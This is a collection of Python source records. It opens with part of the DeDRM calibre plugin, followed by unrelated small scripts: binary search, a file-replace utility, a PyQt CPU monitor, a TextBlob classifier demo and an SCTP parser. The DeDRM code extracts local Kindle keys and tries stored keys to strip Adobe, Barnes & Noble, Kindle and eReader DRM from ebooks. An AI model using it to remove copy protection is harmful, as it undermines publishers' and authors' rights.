PLUGIN_VERSION))\n of = self.temporary_file(\".pdf\")\n\n # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n try:\n result = ineptpdf.decryptBook(userkey, path_to_ebook, of.name)\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n result = 1\n\n of.close()\n\n if result == 0:\n # Decryption was a success\n # Store the new successful key in the defaults\n print(\"{0} v{1}: Saving a new default key\".format(PLUGIN_NAME, PLUGIN_VERSION))\n try:\n dedrmprefs.addnamedvaluetoprefs('adeptkeys', newnames[i], codecs.encode(userkey,'hex').decode('ascii'))\n dedrmprefs.writeprefs()\n print(\"{0} v{1}: 
Saved a new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n except:\n print(\"{0} v{1}: Exception when saving a new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n # Return the modified PersistentTemporary file to calibre.\n return of.name\n\n print(\"{0} v{1}: Failed to decrypt with new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n except Exception as e:\n traceback.print_exc()\n\n\n # Unable to decrypt the PDF with any of the existing keys. Is it a B&N PDF?\n # Attempt to decrypt PDF with each encryption key (generated or provided). \n for keyname, userkey in dedrmprefs['bandnkeys'].items():\n print(\"{0} v{1}: Trying Encryption key {2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".pdf\")\n\n # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n try:\n result = ineptpdf.decryptBook(userkey, path_to_ebook, of.name, False)\n except ineptpdf.ADEPTNewVersionError:\n print(\"{0} v{1}: Book uses unsupported (too new) Adobe DRM.\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n return path_to_ebook\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n result = 1\n\n of.close()\n\n if result == 0:\n # Decryption was successful.\n # Return the modified PersistentTemporary file to calibre.\n print(\"{0} v{1}: Decrypted with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n return of.name\n\n print(\"{0} v{1}: Failed to decrypt with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n\n def PDFStandardDecrypt(self, path_to_ebook):\n # Sub function to prevent PDFDecrypt from becoming too large ...\n import prefs\n import ineptpdf\n dedrmprefs = prefs.DeDRM_Prefs()\n\n # Attempt to decrypt PDF with each encryption key (generated or provided). \n i = -1\n for userpassword in [\"\"] + dedrmprefs['adobe_pdf_passphrases']:\n # Try the empty password, too.\n i = i + 1\n userpassword = bytearray(userpassword, \"utf-8\")\n if i == 0:\n print(\"{0} v{1}: Trying empty password ... \".format(PLUGIN_NAME, PLUGIN_VERSION), end=\"\")\n else:\n print(\"{0} v{1}: Trying password {2} ... 
\".format(PLUGIN_NAME, PLUGIN_VERSION, i), end=\"\")\n of = self.temporary_file(\".pdf\")\n\n # Give the user password, ebook and TemporaryPersistent file to the decryption function.\n msg = False\n try:\n result = ineptpdf.decryptBook(userpassword, path_to_ebook, of.name)\n print(\"done\")\n msg = True\n except ineptpdf.ADEPTInvalidPasswordError:\n print(\"invalid password\".format(PLUGIN_NAME, PLUGIN_VERSION))\n msg = True\n result = 1\n except:\n print(\"exception\\n{0} v{1}: Exception when decrypting after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n msg = True\n traceback.print_exc()\n result = 1\n if not msg:\n print(\"error\\n{0} v{1}: Failed to decrypt after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n\n of.close()\n\n if result == 0:\n # Decryption was successful.\n # Return the modified PersistentTemporary file to calibre.\n print(\"{0} v{1}: Successfully decrypted with password {3} after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime, i))\n return of.name\n \n print(\"{0} v{1}: Didn't manage to decrypt PDF. Make sure the correct password is entered in the settings.\".format(PLUGIN_NAME, PLUGIN_VERSION))\n\n \n \n def PDFDecrypt(self,path_to_ebook):\n import prefs\n import ineptpdf\n import lcpdedrm\n dedrmprefs = prefs.DeDRM_Prefs()\n\n if (lcpdedrm.isLCPbook(path_to_ebook)):\n try: \n retval = lcpdedrm.decryptLCPbook(path_to_ebook, dedrmprefs['lcp_passphrases'], self)\n except:\n print(\"Looks like that didn't work:\")\n raise\n\n return retval\n \n # Not an LCP book, do the normal Adobe handling.\n\n pdf_encryption = ineptpdf.getPDFencryptionType(path_to_ebook)\n if pdf_encryption is None:\n print(\"{0} v{1}: {2} is an unencrypted PDF file - returning as is.\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook)))\n return path_to_ebook\n\n print(\"{0} v{1}: {2} is a PDF ebook with encryption {3}\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook), pdf_encryption))\n\n if pdf_encryption == \"EBX_HANDLER\":\n # Adobe eBook / ADEPT (normal or B&N)\n return self.PDFIneptDecrypt(path_to_ebook)\n elif pdf_encryption == \"Standard\" or pdf_encryption == \"Adobe.APS\":\n return self.PDFStandardDecrypt(path_to_ebook)\n elif pdf_encryption == \"FOPN_fLock\" or pdf_encryption == \"FOPN_foweb\":\n print(\"{0} v{1}: FileOpen encryption '{2}' is unsupported.\".format(PLUGIN_NAME, PLUGIN_VERSION, pdf_encryption))\n print(\"{0} v{1}: Try the standalone script from the 'Tetrachroma_FileOpen_ineptpdf' folder in the Github repo.\".format(PLUGIN_NAME, PLUGIN_VERSION))\n return path_to_ebook\n else:\n print(\"{0} v{1}: Encryption '{2}' is unsupported.\".format(PLUGIN_NAME, PLUGIN_VERSION, pdf_encryption))\n return path_to_ebook\n\n\n def KindleMobiDecrypt(self,path_to_ebook):\n\n # add the alfcrypto directory to sys.path so alfcrypto.py\n # will be able to locate the custom lib(s) for CDLL import.\n sys.path.insert(0, self.alfdir)\n # Had to move this import here so the custom libs can be\n # extracted to the appropriate places beforehand these routines\n # look for them.\n import prefs\n import k4mobidedrm\n\n dedrmprefs = prefs.DeDRM_Prefs()\n pids = dedrmprefs['pids']\n serials = dedrmprefs['serials']\n for android_serials_list in dedrmprefs['androidkeys'].values():\n #print android_serials_list\n serials.extend(android_serials_list)\n #print serials\n androidFiles = []\n kindleDatabases = list(dedrmprefs['kindlekeys'].items())\n\n try:\n book = 
k4mobidedrm.GetDecryptedBook(path_to_ebook,kindleDatabases,androidFiles,serials,pids,self.starttime)\n except Exception as e:\n decoded = False\n # perhaps we need to get a new default Kindle for Mac/PC key\n defaultkeys = []\n print(\"{0} v{1}: Failed to decrypt with error: {2}\".format(PLUGIN_NAME, PLUGIN_VERSION,e.args[0]))\n\n traceback.print_exc()\n\n print(\"{0} v{1}: Looking for new default Kindle Key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n\n try:\n if iswindows or isosx:\n from kindlekey import kindlekeys\n\n defaultkeys = kindlekeys()\n defaultnames = []\n else: # linux\n from wineutils import WineGetKeys\n\n scriptpath = os.path.join(self.alfdir,\"kindlekey.py\")\n defaultkeys, defaultnames = WineGetKeys(scriptpath, \".k4i\",dedrmprefs['kindlewineprefix'])\n except:\n print(\"{0} v{1}: Exception when getting default Kindle Key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n pass\n\n newkeys = {}\n newnames = []\n\n for i,keyvalue in enumerate(defaultkeys):\n if keyvalue not in dedrmprefs['kindlekeys'].values():\n newkeys[\"key_{0:d}\".format(i)] = keyvalue\n\n if len(newkeys) > 0:\n print(\"{0} v{1}: Found {2} new {3}\".format(PLUGIN_NAME, PLUGIN_VERSION, len(newkeys), \"key\" if len(newkeys)==1 else \"keys\"))\n try:\n book = k4mobidedrm.GetDecryptedBook(path_to_ebook,newkeys.items(),[],[],[],self.starttime)\n decoded = True\n # store the new successful keys in the defaults\n print(\"{0} v{1}: Saving {2} new {3}\".format(PLUGIN_NAME, PLUGIN_VERSION, len(newkeys), \"key\" if len(newkeys)==1 else \"keys\"))\n i = 1\n for keyvalue in newkeys.values():\n while \"kindle_key_{0:d}_{1:d}\".format(int(time.time()), i) in dedrmprefs['kindlekeys']:\n i = i + 1\n dedrmprefs.addnamedvaluetoprefs('kindlekeys',\"kindle_key_{0:d}_{1:d}\".format(int(time.time()), i),keyvalue)\n dedrmprefs.writeprefs()\n except Exception as e:\n traceback.print_exc()\n pass\n if not decoded:\n #if you reached here then no luck raise and exception\n print(\"{0} v{1}: Ultimately failed to decrypt after {2:.1f} seconds. Read the FAQs at noDRM's repository: https://github.com/noDRM/DeDRM_tools/blob/master/FAQs.md\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n raise DeDRMError(\"{0} v{1}: Ultimately failed to decrypt after {2:.1f} seconds. 
Read the FAQs at noDRM's repository: https://github.com/noDRM/DeDRM_tools/blob/master/FAQs.md\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n\n of = self.temporary_file(book.getBookExtension())\n book.getFile(of.name)\n of.close()\n book.cleanup()\n return of.name\n\n\n def eReaderDecrypt(self,path_to_ebook):\n\n import prefs\n import erdr2pml\n\n dedrmprefs = prefs.DeDRM_Prefs()\n # Attempt to decrypt epub with each encryption key (generated or provided).\n for keyname, userkey in dedrmprefs['ereaderkeys'].items():\n print(\"{0} v{1}: Trying Encryption key {2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".pmlz\")\n\n # Give the userkey, ebook and TemporaryPersistent file to the decryption function.\n result = erdr2pml.decryptBook(path_to_ebook, of.name, True, codecs.decode(userkey,'hex'))\n\n of.close()\n\n # Decryption was successful return the modified PersistentTemporary\n # file to Calibre's import process.\n if result == 0:\n print(\"{0} v{1}: Successfully decrypted with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n return of.name\n\n print(\"{0} v{1}: Failed to decrypt with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n\n print(\"{0} v{1}: Ultimately failed to decrypt after {2:.1f} seconds. Read the FAQs at noDRM's repository: https://github.com/noDRM/DeDRM_tools/blob/master/FAQs.md\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n raise DeDRMError(\"{0} v{1}: Ultimately failed to decrypt after {2:.1f} seconds. Read the FAQs at noDRM's repository: https://github.com/noDRM/DeDRM_tools/blob/master/FAQs.md\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n\n\n def run(self, path_to_ebook):\n\n # make sure any unicode output gets converted safely with 'replace'\n sys.stdout=utilities.SafeUnbuffered(sys.stdout)\n sys.stderr=utilities.SafeUnbuffered(sys.stderr)\n\n print(\"{0} v{1}: Trying to decrypt {2}\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook)))\n self.starttime = time.time()\n\n booktype = os.path.splitext(path_to_ebook)[1].lower()[1:]\n if booktype in ['prc','mobi','pobi','azw','azw1','azw3','azw4','tpz','kfx-zip']:\n # Kindle/Mobipocket\n decrypted_ebook = self.KindleMobiDecrypt(path_to_ebook)\n elif booktype == 'pdb':\n # eReader\n decrypted_ebook = self.eReaderDecrypt(path_to_ebook)\n pass\n elif booktype == 'pdf':\n # Adobe PDF (hopefully) or LCP PDF\n decrypted_ebook = self.PDFDecrypt(path_to_ebook)\n pass\n elif booktype == 'epub':\n # Adobe Adept, PassHash (B&N) or LCP ePub\n decrypted_ebook = self.ePubDecrypt(path_to_ebook)\n else:\n print(\"Unknown booktype {0}. 
Passing back to calibre unchanged".format(booktype))\n            return path_to_ebook\n        print("{0} v{1}: Finished after {2:.1f} seconds".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n        return decrypted_ebook\n\n    def is_customizable(self):\n        # return true to allow customization via the Plugin->Preferences.\n        return True\n\n    def config_widget(self):\n        import config\n        return config.ConfigWidget(self.plugin_path, self.alfdir)\n\n    def save_settings(self, config_widget):\n        config_widget.save_settings()\n","sub_path":"DeDRM_plugin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":51473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"526640968","text":"#!/usr/bin/python\n\n# Open a file\nfr = open(\"data.csv\")\nfw = open(\"item_names.txt\", \"w\")\n\nfor line in fr:\n    temp = line.split(',')\n    if temp[0] == \"\\r\\n\":\n        x = 0\n    else:\n        #must manually fix dual kamas prime\n        fw.write(temp[0].split(' ')[0] + \" \" + temp[0].split(' ')[1] + \"\\n\");\n","sub_path":"db/python/gear_names.py","file_name":"gear_names.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"636740739","text":"#\n# Binary Search - AlgoExpert\n\n# O(log(n)) time | O(log(n))) space\ndef binarySearch(array, target):\n    return binarySearchHelper(array, target, 0, len(array) - 1)\n\n\ndef binarySearchHelper(array, target, left, right):\n    if left > right:\n        return -1\n    middle = (left + right) // 2\n    potentialMatch = array[middle]\n    if target == potentialMatch:\n        return middle\n    elif target < potentialMatch:\n        return binarySearchHelper(array, target, left, middle - 1)\n    else:\n        return binarySearchHelper(array, target, middle + 1, right)\n\n\n# O(log(n)) time | O(1) space\ndef binarySearch2(array, target):\n    return binarySearchHelper2(array, target, 0, len(array) - 1)\n\n\ndef binarySearchHelper2(array, target, left, right):\n    while left <= right:\n        middle = (left + right) // 2\n        potentialMatch = array[middle]\n        if target == potentialMatch:\n            return middle\n        elif target < potentialMatch:\n            right = middle - 1\n        else:\n            left = middle + 1\n    return -1\n\n\nimport unittest\n\n\nclass TestProgram(unittest.TestCase):\n    def test_case_1(self):\n        self.assertEqual(binarySearch([0, 1, 21, 33, 45, 45, 61, 71, 72, 73], 33), 3)\n\n    def test_case_2(self):\n        self.assertEqual(binarySearch2([0, 1, 21, 33, 45, 45, 61, 71, 72, 73], 33), 3)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"challenge_expert_probs/Python/ez/9ez_binary_search.py","file_name":"9ez_binary_search.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"521706908","text":"# Write a program that implements a 'replace all' feature, as shown in the figure\n# Don't forget: str.replace(old, new[, count]) replaces the old substring with the new one;\n# if count is given, no more than count replacements are made\n# Approach: iterate over the file line by line, replace() the target in matching lines,\n# collect changed and unchanged lines into one list, then rewrite the file with writelines\ndef file_replace(file_name, origin, replace):\n    count = 0  # number of replaced occurrences\n    content = []  # list that collects the lines to write back\n    f_read = open(file_name)\n    for eachline in f_read:\n        if origin in eachline:  # check whether the target string occurs in this line\n            count1 = eachline.count(origin)  # occurrences of the target in this line\n            eachline = eachline.replace(origin, replace)  # do the replacement\n            count += count1  # accumulate the per-line count\n        content.append(eachline)  # add the line to the list\n\n    decide = input('\\nThe file contains %s occurrence(s) of [%s]\\nAre you sure you want to replace every [%s] with [%s]?\\n[YES/NO]:' % (count, origin, origin, replace))\n    if decide.upper() == 'YES':  # accepts 'YES'/'yes'; the original `== 'YES' or 'yes'` was always truthy\n        f_write = open(file_name, 
'w')\n        f_write.writelines(content)\n        f_write.close()\n        print('Replacement successful')\n    else:\n        print('No changes made')\n    f_read.close()\n\nfile_name = input('Please enter the file name: ')\norigin = input('Please enter the word or characters to replace: ')\nreplace = input('Please enter the new word or characters: ')\nfile_replace(file_name, origin, replace)","sub_path":"29.4.py","file_name":"29.4.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"476482838","text":"from PyQt6 import QtWidgets, QtCore\nimport pyqtgraph as pg\nimport sys\nimport time\nfrom echo_client_cpu_class import *\n\n\nclass Widget(QtWidgets.QWidget):\n\n    def __init__(self, interval=2.0, timewindow=50):\n        \"\"\" interval,timewindow:seconds\"\"\"\n        super(Widget, self).__init__()\n        self._interval = interval\n        self._timewindow = timewindow\n\n        self.button = QtWidgets.QPushButton(\n            text=\"Monitoring Off, Press the Button to Start\",\n            checkable=True)\n        self.button.clicked.connect(self.monitoring)\n\n        vlay = QtWidgets.QVBoxLayout(self)  # vertically arranged widgets\n        vlay.addWidget(self.button)\n\n        self.graphWidget = pg.PlotWidget()\n\n        # Add Background colour to white\n        self.graphWidget.setBackground('w')\n        # Add Title\n        self.graphWidget.setTitle(\n            \"The Live Data of CPU Utilization as a Percentage \", color=\"b\", size=\"15pt\")\n        # Add Axis Labels\n        styles = {\"color\": \"black\", \"font-size\": \"15px\"}\n        self.graphWidget.setLabel(\"left\", \"CPU(%)\", **styles)\n\n        axis = pg.DateAxisItem(orientation='bottom')\n        self.graphWidget.setAxisItems({\"bottom\": axis})\n        self.graphWidget.setLabel(\n            \"bottom\", f\"Time (interval:{self._interval}s timewindow:{self._timewindow}s)\", **styles)\n\n        # Add legend\n        self.graphWidget.addLegend()\n        # Add grid\n        self.graphWidget.showGrid(x=True, y=True)\n\n        vlay.addWidget(self.graphWidget)\n\n        self.i = 0\n        curtime = time.time()\n        self.graphWidget.setXRange(\n            curtime, curtime+self._timewindow, padding=0)\n\n        self.x = []\n        self.cpu = []\n        self.data_line = self.plot([], [], \"CPU(%)\", 'b')\n\n        self.timer = QtCore.QTimer()\n        self.timer.setInterval(int(self._interval*1000))\n        self.timer.timeout.connect(self.update_plot_data)\n        self.monitoring_on = False\n        # client\n        self.client = clientcpu(host=\"localhost\", port=5000)\n        self.client.connect()\n        self.setWindowTitle(f'CPU Utilization as a Percentage (Server Host: {self.client.host} Port: {self.client.port})')\n\n\n    def plot(self, x, y, plotname, color):\n        pen = pg.mkPen(color=color)\n        return self.graphWidget.plot(x, y, name=plotname, pen=pen,\n                                     symbol='o', symbolSize=5, symbolBrush=(color))\n\n    def update_plot_data(self):\n        cpu_percent = self.client.receive_data()\n        if (self.i == 0.0):\n            curtime = time.time()\n            self.graphWidget.setXRange(\n                curtime, curtime+self._timewindow, padding=0)\n\n        if self.i < self._timewindow:\n            self.x.append(time.time())  # Add a new value\n            self.cpu.append(cpu_percent)  # Add a new value.\n            self.i += self._interval\n        else:\n            # Once enough data is captured, append the newest data point and delete the oldest\n            curtime = time.time()\n            self.x.append(curtime)  # Add a new value\n            self.cpu.append(cpu_percent)\n            del self.x[0]\n            del self.cpu[0]\n            self.graphWidget.setXRange(\n                curtime-self._timewindow, curtime, padding=0)\n\n        self.data_line.setData(self.x, self.cpu)  # Update the data.\n\n    def monitoring(self):\n        if self.monitoring_on == False:\n            self.timer.start()\n            self.monitoring_on = True\n            self.button.setText(\"Monitoring On, Press the Button to Stop\")\n        else:\n            self.timer.stop()\n            self.monitoring_on = False\n            
self.button.setText(\"Monitoring Off, Press the Button to Start\")\n\n def closeEvent(self, event):\n self.client.disconnect()\n \nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n w = Widget(interval=0.5, timewindow=25.0)\n w.show()\n sys.exit(app.exec())\n","sub_path":"notebook/code/python/pyqt6-gui-qtime_client.py","file_name":"pyqt6-gui-qtime_client.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"154791131","text":"from itertools import permutations\nimport numpy as np #for vectorized operations\n\ndef factorial(n):\n if n == 0:\n return 1\n else:\n return n * factorial(n-1)\n\nsdc = [4,2,1]\nidc = [4,3]\n\nnum_permutations = factorial(len(idc))\nprint(num_permutations)\n\nperm_idc = permutations(idc)\n\nposs_differences = np.zeros(shape=(num_permutations,2))\n\nfor i in range(num_permutations):\n\ttry:\n\t\tpermutation = np.array(next(perm_idc))\n\t\tprint(permutation)\n\t\tposs_differences[i] = np.array(sdc) - permutation\n\texcept:\n\t\tprint('iterator exhausted')\n\n\n\nprint(poss_differences)\n","sub_path":"foveatedWord/untitled.py","file_name":"untitled.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"145099439","text":"from typing import List\n\n\nraw = input().strip().split(' ')\n\na = []\nfor i in range(3):\n raw = input().strip().split(' ')\n a.append([int(x) for x in raw])\n a[i].sort()\n\nm = 1\nfor i in range(3):\n for item in a[i]:\n if item > m:\n m = item\n\n\ndef next(last: List, cur: List) -> List:\n point = last[0]\n count = len(last)\n for i in range(point + 1, m + 1):\n if (cur.count(i) >= count):\n return [i for j in range(count)][:]\n for i in range(1, point + 1):\n if (cur.count(i) >= count + 1):\n return [i for j in range(count + 1)][:]\n return None\n\n\nlast = [0]\nlast_index = 0\n\nrunning = True\nwhile running:\n for i in range(3):\n cur_list = a[i]\n cur = next(last, cur_list)\n\n if (last_index == i):\n cur = next([0], cur_list)\n # print(\"[debug] #{}: new round\".format(i + 1))\n elif (cur == None):\n # print(\"[debug] #{}: pass\".format(i + 1))\n continue\n\n point = cur[0]\n count = len(cur)\n for j in range(count):\n cur_list.remove(point)\n\n last = cur[:]\n last_index = i\n # print(\"[debug] #{}: {}\".format(i + 1, cur))\n\n if (len(cur_list) == 0):\n # print(\"[debug] #{}: won\".format(i + 1))\n print(i + 1)\n running = False\n break\n","sub_path":"contest/chuanzhicup/2021-c3/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"344293315","text":"from textblob.classifiers import NaiveBayesClassifier\n\ntrain = [\n ('I love this sandwich.', 'positive'),\n ('This is an amazing place!', 'positive'),\n ('I feel very good about these beers.', 'positive'),\n ('This is my best work.', 'positive'),\n (\"What an awesome view\", 'positive'),\n ('I do not like this restaurant', 'negative'),\n ('I am tired of this stuff.', 'negative'),\n (\"I can't deal with this\", 'negative'),\n ('He is my sworn enemy!', 'negative'),\n ('My boss is horrible.', 'negative')\n]\n\nclassifier = NaiveBayesClassifier(train)\n\nprint(\"Classifying some examples:\")\nexample1 = \"These burgers are amazing\"\nprint(example1, \":\", classifier.classify(example1))\nexample2 = \"I do not like pizza\"\nprint(example2, \":\", 
classifier.classify(example2))\nprint()\n\ntest = [\n    ('The beer was good.', 'positive'),\n    ('I do not enjoy my job', 'negative'),\n    (\"I ain't feeling dandy today.\", 'negative'),\n    (\"I feel amazing!\", 'positive'),\n    ('Gary is a friend of mine.', 'positive'),\n    (\"I can't believe I'm doing this.\", 'negative')\n]\n\nprint(\"Accuracy of classifier on test set: {0:.2f}\".format(\n    classifier.accuracy(test)))\nprint()\n\n# print(classifier.show_informative_features())\n\n# Loading data from json file and creating new NB classifier\nwith open('data.json', 'r') as fp:\n    cl = NaiveBayesClassifier(fp, format='json')\n\nprint(\"Classifying some examples:\")\nexample1 = \"This is an amazing library!\"\nprint(example1, \":\", cl.classify(example1))\nexample2 = \"This one's a doozy.\"\nprob_dist = cl.prob_classify(example2)\nprint(example2, \":\", prob_dist.max())\nprint(\"Probability positive:\", round(prob_dist.prob(\"pos\"), 2))\nprint(\"Probability negative:\", round(prob_dist.prob(\"neg\"), 2))\nprint()\n\n# Classifying textblobs\nfrom textblob import TextBlob\nblob = TextBlob(\"The beer is good. But the hangover is horrible.\", classifier=cl)\n#print(blob.classify())\n\nfor s in blob.sentences:\n    print(s, \":\", end=' ')\n    print(s.classify())\nprint()\n\n# Evaluating classifiers\nprint(\"Accuracy: {0:.2f}\".format(classifier.accuracy(test)))\nprint(classifier.show_informative_features(5))\n\n# Updating Classifiers with new data (labels must match the 'positive'/'negative' training labels above)\nnew_data = [('She is my best friend.', 'positive'),\n            (\"I'm happy to have a new friend.\", 'positive'),\n            (\"Stay thirsty, my friend.\", 'positive'),\n            (\"He ain't from around here.\", 'negative')]\nclassifier.update(new_data)\nprint(\"Accuracy: {0:.2f}\".format(classifier.accuracy(test)))\n","sub_path":"machine_learning/naive_bayes_classifier/naivebayes.py","file_name":"naivebayes.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"113832533","text":"\"\"\"\nSCTP Socket State Parser\n========================\n\nParsers provided by this module include:\n\nSCTPEps - file ``/proc/net/sctp/eps``\n-------------------------------------\n\"\"\"\n\nfrom insights import Parser, parser\nfrom insights.parsers import SkipException, ParseException\nfrom . import keyword_search\nfrom insights.specs import Specs\n\n\n@parser(Specs.sctp_eps)\nclass SCTPEps(Parser):\n    \"\"\"\n    This parser parses the content of the ``/proc/net/sctp/eps`` file.\n    It returns a list of dictionaries. 
Each dictionary contains detailed\n    information about an individual SCTP endpoint, including Endpoints, Socket,\n    Socket type, Socket State, hash bucket, bind port, UID, socket inodes and\n    Local IP addresses.\n\n    Typical contents of ``/proc/net/sctp/eps`` file are::\n\n        ENDPT SOCK STY SST HBKT LPORT UID INODE LADDRS\n        ffff88017e0a0200 ffff880300f7fa00 2 10 29 11165 200 299689357 10.0.0.102 10.0.0.70\n        ffff880612e81c00 ffff8803c28a1b00 2 10 30 11166 200 273361203 10.0.0.102 10.0.0.70 172.31.1.2\n\n    Output data is stored in dictionary format\n\n    Examples:\n        >>> type(sctp_info)\n        <class 'insights.parsers.sctp.SCTPEps'>\n        >>> sorted(sctp_info.sctp_local_ports) == sorted(['11165', '11166'])\n        True\n        >>> sorted(sctp_info.sctp_local_ips) == sorted(['10.0.0.102', '10.0.0.70', '172.31.1.2'])\n        True\n        >>> sorted(sctp_info.search(local_port=\"11165\")) == sorted([{'endpoints': 'ffff88017e0a0200', 'socket': 'ffff880300f7fa00', 'sk_type': '2', 'sk_state': '10', 'hash_bkt': '29', 'local_port': '11165', 'uid': '200', 'inode': '299689357', 'local_addr': ['10.0.0.102', '10.0.0.70']}])\n        True\n        >>> len(sctp_info.search(local_port=\"11165\")) == 1\n        True\n        >>> len(sctp_info.search(endpoints=\"ffff88017e0a0200\")) == 1\n        True\n        >>> sctp_info.sctp_eps_ips\n        {'ffff88017e0a0200': ['10.0.0.102', '10.0.0.70'], 'ffff880612e81c00': ['10.0.0.102', '10.0.0.70', '172.31.1.2']}\n    \"\"\"\n\n    def parse_content(self, content):\n        if (not content) or (not self.file_path):\n            raise SkipException(\"No Contents\")\n\n        COLUMN_IDX = {\n            'ENDPT': 'endpoints',\n            'SOCK': 'socket',\n            'STY': 'sk_type',\n            'SST': 'sk_state',\n            'HBKT': 'hash_bkt',\n            'LPORT': 'local_port',\n            'UID': 'uid',\n            'INODE': 'inode',\n            'LADDRS': 'local_addr'\n        }\n\n        self.data = []\n        exp_column = COLUMN_IDX.keys()\n        self._sctp_local_ports = []\n        self._sctp_local_ips = set([])\n        self._sctp_eps_ips = {}\n        for line in content:\n            row = {}\n            line = line.strip()\n            line = line.split()\n            if (\"LPORT\" in line):\n                if len(line) == len(exp_column):\n                    columns = line\n                else:\n                    raise ParseException(\"Contents are not compatible with this parser\")\n            else:\n                for idx, val in enumerate(columns):\n                    if val == \"ENDPT\":\n                        # Save endpoint\n                        _eps = line[idx]\n                        self._sctp_eps_ips[_eps] = []\n                    if val == \"LADDRS\":\n                        # Append multihomed ip address\n                        key = COLUMN_IDX[val]\n                        row[key] = []\n                        while (idx != len(line)):\n                            ip_addr = line[idx]\n                            row[key].append(ip_addr)\n                            self._sctp_local_ips.add(ip_addr)\n                            self._sctp_eps_ips[_eps].append(ip_addr)\n                            idx = idx + 1\n                    else:\n                        key = COLUMN_IDX[val]\n                        row[key] = line[idx]\n                        if key == 'local_port':\n                            self._sctp_local_ports.append(line[idx])\n                self.data.append(row)\n\n    @property\n    def sctp_local_ports(self):\n        \"\"\"\n        (list): This function returns a list of SCTP ports if SCTP\n        endpoints are created, else `[]`.\n        \"\"\"\n        return self._sctp_local_ports\n\n    @property\n    def sctp_local_ips(self):\n        \"\"\"\n        (list): This function returns a list of all local ip addresses\n        if SCTP endpoints are created, else `[]`.\n        \"\"\"\n        return list(self._sctp_local_ips)\n\n    @property\n    def sctp_eps_ips(self):\n        \"\"\"\n        (dict): This function returns a dict of all endpoints and corresponding\n        local ip addresses used by SCTP endpoints if SCTP endpoints are\n        created, else `{}`.\n        \"\"\"\n        return self._sctp_eps_ips\n\n    def search(self, **args):\n        \"\"\"\n        (list): This function returns a list of all endpoints when the args search\n        matches, and returns `[]` when it does not match.\n        \"\"\"\n        return keyword_search(self.data, 
